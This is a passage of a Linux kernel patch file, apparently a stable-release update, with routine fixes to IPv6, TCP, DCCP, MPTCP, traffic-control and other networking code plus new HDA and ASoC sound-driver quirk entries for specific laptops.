+ 	/* Clone pktoptions received with SYN, if we own the req */
+ 	if (*own_req && ireq->pktopts) {
+-		newnp->pktoptions = skb_clone(ireq->pktopts, GFP_ATOMIC);
++		newnp->pktoptions = skb_clone_and_charge_r(ireq->pktopts, newsk);
+ 		consume_skb(ireq->pktopts);
+ 		ireq->pktopts = NULL;
+-		if (newnp->pktoptions)
+-			skb_set_owner_r(newnp->pktoptions, newsk);
+ 	}
+ 
+ 	return newsk;
+@@ -615,7 +613,7 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
+ 					       --ANK (980728)
+ 	 */
+ 	if (np->rxopt.all)
+-		opt_skb = skb_clone(skb, GFP_ATOMIC);
++		opt_skb = skb_clone_and_charge_r(skb, sk);
+ 
+ 	if (sk->sk_state == DCCP_OPEN) { /* Fast path */
+ 		if (dccp_rcv_established(sk, skb, dccp_hdr(skb), skb->len))
+@@ -679,7 +677,6 @@ ipv6_pktoptions:
+ 			np->flow_label = ip6_flowlabel(ipv6_hdr(opt_skb));
+ 		if (ipv6_opt_accepted(sk, opt_skb,
+ 				      &DCCP_SKB_CB(opt_skb)->header.h6)) {
+-			skb_set_owner_r(opt_skb, sk);
+ 			memmove(IP6CB(opt_skb),
+ 				&DCCP_SKB_CB(opt_skb)->header.h6,
+ 				sizeof(struct inet6_skb_parm));
+diff --git a/net/ipv6/datagram.c b/net/ipv6/datagram.c
+index ba28aeb7cade0..e70ace403bbd0 100644
+--- a/net/ipv6/datagram.c
++++ b/net/ipv6/datagram.c
+@@ -51,7 +51,7 @@ static void ip6_datagram_flow_key_init(struct flowi6 *fl6, struct sock *sk)
+ 	fl6->flowi6_mark = sk->sk_mark;
+ 	fl6->fl6_dport = inet->inet_dport;
+ 	fl6->fl6_sport = inet->inet_sport;
+-	fl6->flowlabel = np->flow_label;
++	fl6->flowlabel = ip6_make_flowinfo(np->tclass, np->flow_label);
+ 	fl6->flowi6_uid = sk->sk_uid;
+ 
+ 	if (!oif)
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index f0548dbcabd2d..ea1ecf5fe947c 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -272,6 +272,7 @@ static int tcp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
+ 	fl6.flowi6_proto = IPPROTO_TCP;
+ 	fl6.daddr = sk->sk_v6_daddr;
+ 	fl6.saddr = saddr ? *saddr : np->saddr;
++	fl6.flowlabel = ip6_make_flowinfo(np->tclass, np->flow_label);
+ 	fl6.flowi6_oif = sk->sk_bound_dev_if;
+ 	fl6.flowi6_mark = sk->sk_mark;
+ 	fl6.fl6_dport = usin->sin6_port;
+@@ -1388,14 +1389,11 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
+ 
+ 		/* Clone pktoptions received with SYN, if we own the req */
+ 		if (ireq->pktopts) {
+-			newnp->pktoptions = skb_clone(ireq->pktopts,
+-						      sk_gfp_mask(sk, GFP_ATOMIC));
++			newnp->pktoptions = skb_clone_and_charge_r(ireq->pktopts, newsk);
+ 			consume_skb(ireq->pktopts);
+ 			ireq->pktopts = NULL;
+-			if (newnp->pktoptions) {
++			if (newnp->pktoptions)
+ 				tcp_v6_restore_cb(newnp->pktoptions);
+-				skb_set_owner_r(newnp->pktoptions, newsk);
+-			}
+ 		}
+ 	} else {
+ 		if (!req_unhash && found_dup_sk) {
+@@ -1467,7 +1465,7 @@ int tcp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
+ 					       --ANK (980728)
+ 	 */
+ 	if (np->rxopt.all)
+-		opt_skb = skb_clone(skb, sk_gfp_mask(sk, GFP_ATOMIC));
++		opt_skb = skb_clone_and_charge_r(skb, sk);
+ 
+ 	reason = SKB_DROP_REASON_NOT_SPECIFIED;
+ 	if (sk->sk_state == TCP_ESTABLISHED) { /* Fast path */
+@@ -1553,7 +1551,6 @@ ipv6_pktoptions:
+ 		if (np->repflow)
+ 			np->flow_label = ip6_flowlabel(ipv6_hdr(opt_skb));
+ 		if (ipv6_opt_accepted(sk, opt_skb, &TCP_SKB_CB(opt_skb)->header.h6)) {
+-			skb_set_owner_r(opt_skb, sk);
+ 			tcp_v6_restore_cb(opt_skb);
+ 			opt_skb = xchg(&np->pktoptions, opt_skb);
+ 		} else {
+diff --git a/net/mpls/af_mpls.c b/net/mpls/af_mpls.c
+index b52afe316dc41..f1f43894efb8e 100644
+--- a/net/mpls/af_mpls.c
++++ b/net/mpls/af_mpls.c
+@@ -1428,6 +1428,7 @@ static int mpls_dev_sysctl_register(struct net_device *dev,
+ free:
+ 	kfree(table);
+ out:
++	mdev->sysctl = NULL;
+ 	return -ENOBUFS;
+ }
+ 
+@@ -1437,6 +1438,9 @@ static void mpls_dev_sysctl_unregister(struct net_device *dev,
+ 	struct net *net = dev_net(dev);
+ 	struct ctl_table *table;
+ 
++	if (!mdev->sysctl)
++		return;
++
+ 	table = mdev->sysctl->ctl_table_arg;
+ 	unregister_net_sysctl_table(mdev->sysctl);
+ 	kfree(table);
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 9813ed0fde9bd..5e38a0abbabae 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -992,8 +992,8 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ {
+ 	int addrlen = sizeof(struct sockaddr_in);
+ 	struct sockaddr_storage addr;
+-	struct mptcp_sock *msk;
+ 	struct socket *ssock;
++	struct sock *newsk;
+ 	int backlog = 1024;
+ 	int err;
+ 
+@@ -1002,17 +1002,15 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	if (err)
+ 		return err;
+ 
+-	msk = mptcp_sk(entry->lsk->sk);
+-	if (!msk) {
+-		err = -EINVAL;
+-		goto out;
+-	}
++	newsk = entry->lsk->sk;
++	if (!newsk)
++		return -EINVAL;
+ 
+-	ssock = __mptcp_nmpc_socket(msk);
+-	if (!ssock) {
+-		err = -EINVAL;
+-		goto out;
+-	}
++	lock_sock(newsk);
++	ssock = __mptcp_nmpc_socket(mptcp_sk(newsk));
++	release_sock(newsk);
++	if (!ssock)
++		return -EINVAL;
+ 
+ 	mptcp_info2sockaddr(&entry->addr, &addr, entry->addr.family);
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
+@@ -1022,20 +1020,16 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	err = kernel_bind(ssock, (struct sockaddr *)&addr, addrlen);
+ 	if (err) {
+ 		pr_warn("kernel_bind error, err=%d", err);
+-		goto out;
++		return err;
+ 	}
+ 
+ 	err = kernel_listen(ssock, backlog);
+ 	if (err) {
+ 		pr_warn("kernel_listen error, err=%d", err);
+-		goto out;
++		return err;
+ 	}
+ 
+ 	return 0;
+-
+-out:
+-	sock_release(entry->lsk);
+-	return err;
+ }
+ 
+ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+@@ -1327,7 +1321,7 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 		return -EINVAL;
+ 	}
+ 
+-	entry = kmalloc(sizeof(*entry), GFP_KERNEL_ACCOUNT);
++	entry = kzalloc(sizeof(*entry), GFP_KERNEL_ACCOUNT);
+ 	if (!entry) {
+ 		GENL_SET_ERR_MSG(info, "can't allocate addr");
+ 		return -ENOMEM;
+@@ -1338,22 +1332,21 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 		ret = mptcp_pm_nl_create_listen_socket(skb->sk, entry);
+ 		if (ret) {
+ 			GENL_SET_ERR_MSG(info, "create listen socket error");
+-			kfree(entry);
+-			return ret;
++			goto out_free;
+ 		}
+ 	}
+ 	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry);
+ 	if (ret < 0) {
+ 		GENL_SET_ERR_MSG(info, "too many addresses or duplicate one");
+-		if (entry->lsk)
+-			sock_release(entry->lsk);
+-		kfree(entry);
+-		return ret;
++		goto out_free;
+ 	}
+ 
+ 	mptcp_nl_add_subflow_or_signal_addr(sock_net(skb->sk));
+-
+ 	return 0;
++
++out_free:
++	__mptcp_pm_release_addr_entry(entry);
++	return ret;
+ }
+ 
+ int mptcp_pm_get_flags_and_ifindex_by_id(struct mptcp_sock *msk, unsigned int id,
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index c7cb68c725b29..696ba398d699a 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -769,17 +769,24 @@ static int mptcp_setsockopt_sol_tcp_defer(struct mptcp_sock *msk, sockptr_t optv
+ 	return tcp_setsockopt(listener->sk, SOL_TCP, TCP_DEFER_ACCEPT, optval, optlen);
+ }
+ 
+-static int mptcp_setsockopt_sol_tcp_fastopen_connect(struct mptcp_sock *msk, sockptr_t optval,
+-						     unsigned int optlen)
++static int mptcp_setsockopt_first_sf_only(struct mptcp_sock *msk, int level, int optname,
++					  sockptr_t optval, unsigned int optlen)
+ {
++	struct sock *sk = (struct sock *)msk;
+ 	struct socket *sock;
++	int ret = -EINVAL;
+ 
+-	/* Limit to first subflow */
++	/* Limit to first subflow, before the connection establishment */
++	lock_sock(sk);
+ 	sock = __mptcp_nmpc_socket(msk);
+ 	if (!sock)
+-		return -EINVAL;
++		goto unlock;
+ 
+-	return tcp_setsockopt(sock->sk, SOL_TCP, TCP_FASTOPEN_CONNECT, optval, optlen);
++	ret = tcp_setsockopt(sock->sk, level, optname, optval, optlen);
++
++unlock:
++	release_sock(sk);
++	return ret;
+ }
+ 
+ static int mptcp_setsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+@@ -811,7 +818,8 @@ static int mptcp_setsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 	case TCP_DEFER_ACCEPT:
+ 		return mptcp_setsockopt_sol_tcp_defer(msk, optval, optlen);
+ 	case TCP_FASTOPEN_CONNECT:
+-		return mptcp_setsockopt_sol_tcp_fastopen_connect(msk, optval, optlen);
++		return mptcp_setsockopt_first_sf_only(msk, SOL_TCP, optname,
++						      optval, optlen);
+ 	}
+ 
+ 	return -EOPNOTSUPP;
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 929b0ee8b3d5f..c4971bc42f60f 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1631,7 +1631,7 @@ int mptcp_subflow_create_socket(struct sock *sk, unsigned short family,
+ 	if (err)
+ 		return err;
+ 
+-	lock_sock(sf->sk);
++	lock_sock_nested(sf->sk, SINGLE_DEPTH_NESTING);
+ 
+ 	/* the newly created socket has to be in the same cgroup as its parent */
+ 	mptcp_attach_cgroup(sk, sf->sk);
+diff --git a/net/openvswitch/meter.c b/net/openvswitch/meter.c
+index 6e38f68f88c26..f2698d2316dfc 100644
+--- a/net/openvswitch/meter.c
++++ b/net/openvswitch/meter.c
+@@ -449,7 +449,7 @@ static int ovs_meter_cmd_set(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	err = attach_meter(meter_tbl, meter);
+ 	if (err)
+-		goto exit_unlock;
++		goto exit_free_old_meter;
+ 
+ 	ovs_unlock();
+ 
+@@ -472,6 +472,8 @@ static int ovs_meter_cmd_set(struct sk_buff *skb, struct genl_info *info)
+ 	genlmsg_end(reply, ovs_reply_header);
+ 	return genlmsg_reply(reply, info);
+ 
++exit_free_old_meter:
++	ovs_meter_free(old_meter);
+ exit_unlock:
+ 	ovs_unlock();
+ 	nlmsg_free(reply);
+diff --git a/net/rose/af_rose.c b/net/rose/af_rose.c
+index 36fefc3957d77..ca2b17f32670d 100644
+--- a/net/rose/af_rose.c
++++ b/net/rose/af_rose.c
+@@ -488,6 +488,12 @@ static int rose_listen(struct socket *sock, int backlog)
+ {
+ 	struct sock *sk = sock->sk;
+ 
++	lock_sock(sk);
++	if (sock->state != SS_UNCONNECTED) {
++		release_sock(sk);
++		return -EINVAL;
++	}
++
+ 	if (sk->sk_state != TCP_LISTEN) {
+ 		struct rose_sock *rose = rose_sk(sk);
+ 
+@@ -497,8 +503,10 @@ static int rose_listen(struct socket *sock, int backlog)
+ 		memset(rose->dest_digis, 0, AX25_ADDR_LEN * ROSE_MAX_DIGIS);
+ 		sk->sk_max_ack_backlog = backlog;
+ 		sk->sk_state           = TCP_LISTEN;
++		release_sock(sk);
+ 		return 0;
+ 	}
++	release_sock(sk);
+ 
+ 	return -EOPNOTSUPP;
+ }
+diff --git a/net/sched/act_ctinfo.c b/net/sched/act_ctinfo.c
+index eaa02f098d1c3..7275ad869f8ea 100644
+--- a/net/sched/act_ctinfo.c
++++ b/net/sched/act_ctinfo.c
+@@ -91,7 +91,7 @@ static int tcf_ctinfo_act(struct sk_buff *skb, const struct tc_action *a,
+ 	cp = rcu_dereference_bh(ca->params);
+ 
+ 	tcf_lastuse_update(&ca->tcf_tm);
+-	bstats_update(&ca->tcf_bstats, skb);
++	tcf_action_update_bstats(&ca->common, skb);
+ 	action = READ_ONCE(ca->tcf_action);
+ 
+ 	wlen = skb_network_offset(skb);
+@@ -210,8 +210,8 @@ static int tcf_ctinfo_init(struct net *net, struct nlattr *nla,
+ 	index = actparm->index;
+ 	err = tcf_idr_check_alloc(tn, &index, a, bind);
+ 	if (!err) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_ctinfo_ops, bind, false, flags);
++		ret = tcf_idr_create_from_flags(tn, index, est, a,
++						&act_ctinfo_ops, bind, flags);
+ 		if (ret) {
+ 			tcf_idr_cleanup(tn, index);
+ 			return ret;
+diff --git a/net/sched/cls_tcindex.c b/net/sched/cls_tcindex.c
+index 4bdcbee4bec56..eea8e185fcdb2 100644
+--- a/net/sched/cls_tcindex.c
++++ b/net/sched/cls_tcindex.c
+@@ -12,6 +12,7 @@
+ #include <linux/errno.h>
+ #include <linux/slab.h>
+ #include <linux/refcount.h>
++#include <linux/rcupdate.h>
+ #include <net/act_api.h>
+ #include <net/netlink.h>
+ #include <net/pkt_cls.h>
+@@ -338,6 +339,7 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 	struct tcf_result cr = {};
+ 	int err, balloc = 0;
+ 	struct tcf_exts e;
++	bool update_h = false;
+ 
+ 	err = tcf_exts_init(&e, net, TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+ 	if (err < 0)
+@@ -455,10 +457,13 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 		}
+ 	}
+ 
+-	if (cp->perfect)
++	if (cp->perfect) {
+ 		r = cp->perfect + handle;
+-	else
+-		r = tcindex_lookup(cp, handle) ? : &new_filter_result;
++	} else {
++		/* imperfect area is updated in-place using rcu */
++		update_h = !!tcindex_lookup(cp, handle);
++		r = &new_filter_result;
++	}
+ 
+ 	if (r == &new_filter_result) {
+ 		f = kzalloc(sizeof(*f), GFP_KERNEL);
+@@ -484,7 +489,28 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 
+ 	rcu_assign_pointer(tp->root, cp);
+ 
+-	if (r == &new_filter_result) {
++	if (update_h) {
++		struct tcindex_filter __rcu **fp;
++		struct tcindex_filter *cf;
++
++		f->result.res = r->res;
++		tcf_exts_change(&f->result.exts, &r->exts);
++
++		/* imperfect area bucket */
++		fp = cp->h + (handle % cp->hash);
++
++		/* lookup the filter, guaranteed to exist */
++		for (cf = rcu_dereference_bh_rtnl(*fp); cf;
++		     fp = &cf->next, cf = rcu_dereference_bh_rtnl(*fp))
++			if (cf->key == (u16)handle)
++				break;
++
++		f->next = cf->next;
++
++		cf = rcu_replace_pointer(*fp, f, 1);
++		tcf_exts_get_net(&cf->result.exts);
++		tcf_queue_work(&cf->rwork, tcindex_destroy_fexts_work);
++	} else if (r == &new_filter_result) {
+ 		struct tcindex_filter *nfp;
+ 		struct tcindex_filter __rcu **fp;
+ 
+diff --git a/net/sched/sch_htb.c b/net/sched/sch_htb.c
+index 3afac9c21a763..67b1879ea8e10 100644
+--- a/net/sched/sch_htb.c
++++ b/net/sched/sch_htb.c
+@@ -427,7 +427,10 @@ static void htb_activate_prios(struct htb_sched *q, struct htb_class *cl)
+ 	while (cl->cmode == HTB_MAY_BORROW && p && mask) {
+ 		m = mask;
+ 		while (m) {
+-			int prio = ffz(~m);
++			unsigned int prio = ffz(~m);
++
++			if (WARN_ON_ONCE(prio >= ARRAY_SIZE(p->inner.clprio)))
++				break;
+ 			m &= ~(1 << prio);
+ 
+ 			if (p->inner.clprio[prio].feed.rb_node)
+diff --git a/net/sctp/diag.c b/net/sctp/diag.c
+index d9c6d8f30f093..b0ce1080842d4 100644
+--- a/net/sctp/diag.c
++++ b/net/sctp/diag.c
+@@ -343,11 +343,9 @@ static int sctp_sock_filter(struct sctp_endpoint *ep, struct sctp_transport *tsp
+ 	struct sctp_comm_param *commp = p;
+ 	struct sock *sk = ep->base.sk;
+ 	const struct inet_diag_req_v2 *r = commp->r;
+-	struct sctp_association *assoc =
+-		list_entry(ep->asocs.next, struct sctp_association, asocs);
+ 
+ 	/* find the ep only once through the transports by this condition */
+-	if (tsp->asoc != assoc)
++	if (!list_is_first(&tsp->asoc->asocs, &ep->asocs))
+ 		return 0;
+ 
+ 	if (r->sdiag_family != AF_UNSPEC && sk->sk_family != r->sdiag_family)
+diff --git a/net/socket.c b/net/socket.c
+index 73463c7c3702b..29a4bad1b1d81 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -971,9 +971,12 @@ static inline void sock_recv_drops(struct msghdr *msg, struct sock *sk,
+ static void sock_recv_mark(struct msghdr *msg, struct sock *sk,
+ 			   struct sk_buff *skb)
+ {
+-	if (sock_flag(sk, SOCK_RCVMARK) && skb)
+-		put_cmsg(msg, SOL_SOCKET, SO_MARK, sizeof(__u32),
+-			 &skb->mark);
++	if (sock_flag(sk, SOCK_RCVMARK) && skb) {
++		/* We must use a bounce buffer for CONFIG_HARDENED_USERCOPY=y */
++		__u32 mark = skb->mark;
++
++		put_cmsg(msg, SOL_SOCKET, SO_MARK, sizeof(__u32), &mark);
++	}
+ }
+ 
+ void __sock_recv_cmsgs(struct msghdr *msg, struct sock *sk,
+diff --git a/net/tipc/socket.c b/net/tipc/socket.c
+index e902b01ea3cb1..ff5bb9e4731c4 100644
+--- a/net/tipc/socket.c
++++ b/net/tipc/socket.c
+@@ -2614,6 +2614,7 @@ static int tipc_connect(struct socket *sock, struct sockaddr *dest,
+ 		/* Send a 'SYN-' to destination */
+ 		m.msg_name = dest;
+ 		m.msg_namelen = destlen;
++		iov_iter_kvec(&m.msg_iter, ITER_SOURCE, NULL, 0, 0);
+ 
+ 		/* If connect is in non-blocking case, set MSG_DONTWAIT to
+ 		 * indicate send_msg() is never blocked.
+@@ -2776,6 +2777,7 @@ static int tipc_accept(struct socket *sock, struct socket *new_sock, int flags,
+ 		__skb_queue_head(&new_sk->sk_receive_queue, buf);
+ 		skb_set_owner_r(buf, new_sk);
+ 	}
++	iov_iter_kvec(&m.msg_iter, ITER_SOURCE, NULL, 0, 0);
+ 	__tipc_sendstream(new_sock, &m, 0);
+ 	release_sock(new_sk);
+ exit:
+diff --git a/sound/pci/hda/hda_bind.c b/sound/pci/hda/hda_bind.c
+index 1a868dd9dc4b6..890c2f7c33fc2 100644
+--- a/sound/pci/hda/hda_bind.c
++++ b/sound/pci/hda/hda_bind.c
+@@ -144,6 +144,7 @@ static int hda_codec_driver_probe(struct device *dev)
+ 
+  error:
+ 	snd_hda_codec_cleanup_for_unbind(codec);
++	codec->preset = NULL;
+ 	return err;
+ }
+ 
+@@ -166,6 +167,7 @@ static int hda_codec_driver_remove(struct device *dev)
+ 	if (codec->patch_ops.free)
+ 		codec->patch_ops.free(codec);
+ 	snd_hda_codec_cleanup_for_unbind(codec);
++	codec->preset = NULL;
+ 	module_put(dev->driver->owner);
+ 	return 0;
+ }
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index edd653ece70d7..2e728aad67713 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -795,7 +795,6 @@ void snd_hda_codec_cleanup_for_unbind(struct hda_codec *codec)
+ 	snd_array_free(&codec->cvt_setups);
+ 	snd_array_free(&codec->spdif_out);
+ 	snd_array_free(&codec->verbs);
+-	codec->preset = NULL;
+ 	codec->follower_dig_outs = NULL;
+ 	codec->spdif_status_reset = 0;
+ 	snd_array_free(&codec->mixers);
+@@ -928,7 +927,6 @@ snd_hda_codec_device_init(struct hda_bus *bus, unsigned int codec_addr,
+ 	codec->depop_delay = -1;
+ 	codec->fixup_id = HDA_FIXUP_ID_NOT_SET;
+ 	codec->core.dev.release = snd_hda_codec_dev_release;
+-	codec->core.exec_verb = codec_exec_verb;
+ 	codec->core.type = HDA_DEV_LEGACY;
+ 
+ 	mutex_init(&codec->spdif_mutex);
+@@ -999,6 +997,7 @@ int snd_hda_codec_device_new(struct hda_bus *bus, struct snd_card *card,
+ 	if (snd_BUG_ON(codec_addr > HDA_MAX_CODEC_ADDRESS))
+ 		return -EINVAL;
+ 
++	codec->core.exec_verb = codec_exec_verb;
+ 	codec->card = card;
+ 	codec->addr = codec_addr;
+ 
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index 7b1a30a551f64..75e1d00074b9f 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -1125,6 +1125,7 @@ static const struct hda_device_id snd_hda_id_conexant[] = {
+ 	HDA_CODEC_ENTRY(0x14f11f87, "SN6140", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f12008, "CX8200", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f120d0, "CX11970", patch_conexant_auto),
++	HDA_CODEC_ENTRY(0x14f120d1, "SN6180", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f15045, "CX20549 (Venice)", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f15047, "CX20551 (Waikiki)", patch_conexant_auto),
+ 	HDA_CODEC_ENTRY(0x14f15051, "CX20561 (Hermosa)", patch_conexant_auto),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 1134a493d225a..e103bb3693c06 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -832,7 +832,7 @@ do_sku:
+ 			alc_setup_gpio(codec, 0x02);
+ 			break;
+ 		case 7:
+-			alc_setup_gpio(codec, 0x03);
++			alc_setup_gpio(codec, 0x04);
+ 			break;
+ 		case 5:
+ 		default:
+@@ -9432,10 +9432,17 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	 SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b43, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b44, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b45, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b46, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b87, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 0d283e41f66dc..36314753923b8 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -227,6 +227,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 14 2022"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "TIMI"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 15 2022"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -234,6 +241,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Blade 14 (2022) - RZ09-0427"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "RB"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Swift SFA16-41"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "IRBIS"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "15NBC1011"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/cs42l56.c b/sound/soc/codecs/cs42l56.c
+index 26066682c983e..3b0e715549c9c 100644
+--- a/sound/soc/codecs/cs42l56.c
++++ b/sound/soc/codecs/cs42l56.c
+@@ -1191,18 +1191,12 @@ static int cs42l56_i2c_probe(struct i2c_client *i2c_client)
+ 	if (pdata) {
+ 		cs42l56->pdata = *pdata;
+ 	} else {
+-		pdata = devm_kzalloc(&i2c_client->dev, sizeof(*pdata),
+-				     GFP_KERNEL);
+-		if (!pdata)
+-			return -ENOMEM;
+-
+ 		if (i2c_client->dev.of_node) {
+ 			ret = cs42l56_handle_of_data(i2c_client,
+ 						     &cs42l56->pdata);
+ 			if (ret != 0)
+ 				return ret;
+ 		}
+-		cs42l56->pdata = *pdata;
+ 	}
+ 
+ 	if (cs42l56->pdata.gpio_nreset) {
+diff --git a/sound/soc/intel/boards/sof_cs42l42.c b/sound/soc/intel/boards/sof_cs42l42.c
+index e38bd2831e6ac..e9d190cb13b0a 100644
+--- a/sound/soc/intel/boards/sof_cs42l42.c
++++ b/sound/soc/intel/boards/sof_cs42l42.c
+@@ -336,6 +336,9 @@ static int create_spk_amp_dai_links(struct device *dev,
+ 	links[*id].platforms = platform_component;
+ 	links[*id].num_platforms = ARRAY_SIZE(platform_component);
+ 	links[*id].dpcm_playback = 1;
++	/* firmware-generated echo reference */
++	links[*id].dpcm_capture = 1;
++
+ 	links[*id].no_pcm = 1;
+ 	links[*id].cpus = &cpus[*id];
+ 	links[*id].num_cpus = 1;
+diff --git a/sound/soc/intel/boards/sof_nau8825.c b/sound/soc/intel/boards/sof_nau8825.c
+index 009a41fbefa10..0c723d4d2d63b 100644
+--- a/sound/soc/intel/boards/sof_nau8825.c
++++ b/sound/soc/intel/boards/sof_nau8825.c
+@@ -479,8 +479,6 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 			links[id].num_codecs = ARRAY_SIZE(max_98373_components);
+ 			links[id].init = max_98373_spk_codec_init;
+ 			links[id].ops = &max_98373_ops;
+-			/* feedback stream */
+-			links[id].dpcm_capture = 1;
+ 		} else if (sof_nau8825_quirk &
+ 				SOF_MAX98360A_SPEAKER_AMP_PRESENT) {
+ 			max_98360a_dai_link(&links[id]);
+@@ -493,6 +491,9 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 		links[id].platforms = platform_component;
+ 		links[id].num_platforms = ARRAY_SIZE(platform_component);
+ 		links[id].dpcm_playback = 1;
++		/* feedback stream or firmware-generated echo reference */
++		links[id].dpcm_capture = 1;
++
+ 		links[id].no_pcm = 1;
+ 		links[id].cpus = &cpus[id];
+ 		links[id].num_cpus = 1;
+diff --git a/sound/soc/intel/boards/sof_rt5682.c b/sound/soc/intel/boards/sof_rt5682.c
+index 2358be208c1fd..59c58ef932e4d 100644
+--- a/sound/soc/intel/boards/sof_rt5682.c
++++ b/sound/soc/intel/boards/sof_rt5682.c
+@@ -761,8 +761,6 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 			links[id].num_codecs = ARRAY_SIZE(max_98373_components);
+ 			links[id].init = max_98373_spk_codec_init;
+ 			links[id].ops = &max_98373_ops;
